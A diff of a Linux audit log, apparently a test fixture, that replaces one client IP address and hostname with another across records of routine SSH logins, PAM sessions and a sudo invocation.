-type=USER_ROLE_CHANGE msg=audit(1481077072.564:441): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=USER_START msg=audit(1481077072.589:442): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077072.590:443): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1324 suid=0 rport=63929 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077072.591:444): pid=1327 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1327 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077072.591:445): pid=1327 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1327 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRED_ACQ msg=audit(1481077072.592:446): pid=1327 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=USER_LOGIN msg=audit(1481077072.611:447): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=USER_START msg=audit(1481077072.612:448): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077074.324:449): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1327 suid=1000 rport=63929 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_END msg=audit(1481077074.326:450): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_close grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRED_DISP msg=audit(1481077074.327:451): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=USER_END msg=audit(1481077074.329:452): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=USER_LOGOUT msg=audit(1481077074.329:453): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077074.329:454): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1324 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077074.329:455): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1324 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077083.100:456): pid=1340 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1340 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077083.100:457): pid=1340 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1340 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_SESSION msg=audit(1481077083.118:458): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1340 suid=74 rport=63931 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_SESSION msg=audit(1481077083.118:459): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1340 suid=74 rport=63931 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1481077083.282:460): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63931 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1481077083.282:461): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63931 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_ACCT msg=audit(1481077083.287:462): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077083.288:463): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1340 suid=74 rport=63931 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1481077083.289:464): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=ssh res=success'
-type=CRED_ACQ msg=audit(1481077083.290:465): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
+type=USER_ROLE_CHANGE msg=audit(1481077072.564:441): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=USER_START msg=audit(1481077072.589:442): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077072.590:443): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1324 suid=0 rport=63929 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077072.591:444): pid=1327 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1327 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077072.591:445): pid=1327 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1327 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRED_ACQ msg=audit(1481077072.592:446): pid=1327 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=USER_LOGIN msg=audit(1481077072.611:447): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=USER_START msg=audit(1481077072.612:448): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077074.324:449): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1327 suid=1000 rport=63929 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_END msg=audit(1481077074.326:450): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_close grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRED_DISP msg=audit(1481077074.327:451): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=USER_END msg=audit(1481077074.329:452): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=USER_LOGOUT msg=audit(1481077074.329:453): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077074.329:454): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1324 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077074.329:455): pid=1324 uid=0 auid=1000 ses=2 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1324 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077083.100:456): pid=1340 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1340 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077083.100:457): pid=1340 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1340 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_SESSION msg=audit(1481077083.118:458): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1340 suid=74 rport=63931 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_SESSION msg=audit(1481077083.118:459): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1340 suid=74 rport=63931 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1481077083.282:460): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63931 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1481077083.282:461): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63931 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_ACCT msg=audit(1481077083.287:462): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:accounting grantors=pam_unix,pam_localuser acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077083.288:463): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1340 suid=74 rport=63931 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=USER_AUTH msg=audit(1481077083.289:464): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=success acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=ssh res=success'
+type=CRED_ACQ msg=audit(1481077083.290:465): pid=1339 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
 type=LOGIN msg=audit(1481077083.290:466): pid=1339 uid=0 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 old-auid=4294967295 auid=1000 old-ses=4294967295 ses=3 res=1
-type=USER_ROLE_CHANGE msg=audit(1481077083.358:467): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=USER_START msg=audit(1481077083.388:468): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077083.389:469): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1339 suid=0 rport=63931 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077083.390:470): pid=1342 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1342 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077083.390:471): pid=1342 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1342 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRED_ACQ msg=audit(1481077083.391:472): pid=1342 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=ssh res=success'
-type=USER_LOGIN msg=audit(1481077083.414:473): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=/dev/pts/0 res=success'
-type=USER_START msg=audit(1481077083.414:474): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=96.241.146.97 terminal=/dev/pts/0 res=success'
+type=USER_ROLE_CHANGE msg=audit(1481077083.358:467): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=USER_START msg=audit(1481077083.388:468): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_selinux,pam_loginuid,pam_selinux,pam_namespace,pam_keyinit,pam_keyinit,pam_limits,pam_systemd,pam_unix,pam_lastlog acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077083.389:469): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=session fp=? direction=both spid=1339 suid=0 rport=63931 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077083.390:470): pid=1342 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1342 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077083.390:471): pid=1342 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1342 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRED_ACQ msg=audit(1481077083.391:472): pid=1342 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="some_user" exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=ssh res=success'
+type=USER_LOGIN msg=audit(1481077083.414:473): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1481077083.414:474): pid=1339 uid=0 auid=1000 ses=3 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=pool-216.160.83.61.washdc.fios.verizon.net addr=216.160.83.61 terminal=/dev/pts/0 res=success'
 type=USER_CMD msg=audit(1481077231.363:475): pid=1382 uid=1000 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='cwd="/home/some_user" cmd=2E2F676F2D6175646974202D636F6E6669672061756469742E79616D6C terminal=pts/0 res=success'
 type=CRED_ACQ msg=audit(1481077231.363:476): pid=1382 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=PAM:setcred grantors=pam_env,pam_unix acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
 type=USER_START msg=audit(1481077231.364:477): pid=1382 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='op=PAM:session_open grantors=pam_keyinit,pam_limits acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
@@ -829,30 +829,30 @@ type=EXECVE msg=audit(1481077253.941:486): argc=3 a0="/usr/sbin/sshd" a1="-D" a2
 type=CWD msg=audit(1481077253.941:486):  cwd="/"
 type=PATH msg=audit(1481077253.941:486): item=0 name="/usr/sbin/sshd" inode=17367919 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:sshd_exec_t:s0 objtype=NORMAL
 type=PATH msg=audit(1481077253.941:486): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=16778495 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:ld_so_t:s0 objtype=NORMAL
-type=CRYPTO_KEY_USER msg=audit(1481077253.949:487): pid=1398 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1398 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_KEY_USER msg=audit(1481077253.949:488): pid=1398 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1398 suid=0  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_SESSION msg=audit(1481077253.969:489): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1398 suid=74 rport=63973 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=CRYPTO_SESSION msg=audit(1481077253.969:490): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-client cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1398 suid=74 rport=63973 laddr=10.142.0.2 lport=22  exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1481077254.134:491): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=pubkey_auth rport=63973 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
-type=USER_AUTH msg=audit(1481077254.134:492): pid=1397 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=key algo=ssh-rsa size=2048 fp=ea:4e:a7:19:2a:35:b9:0f:ee:6c:76:f3:3f:52:e4:73 rport=63973 acct="some_user" exe="/usr/sbin/sshd" hostname=? addr=96.241.146.97 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077253.949:487): pid=1398 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=6d:a3:7f:ed:de:4a:79:f2:aa:49:ec:d1:75:36:97:a3 direction=? spid=1398 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
+type=CRYPTO_KEY_USER msg=audit(1481077253.949:488): pid=1398 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=destroy kind=server fp=ce:96:0e:51:3e:14:4e:e8:be:d1:0f:f0:0c:f5:63:a0 direction=? spid=1398 suid=0  exe="/usr/sbin/sshd" hostname=? addr=216.160.83.61 terminal=? res=success'
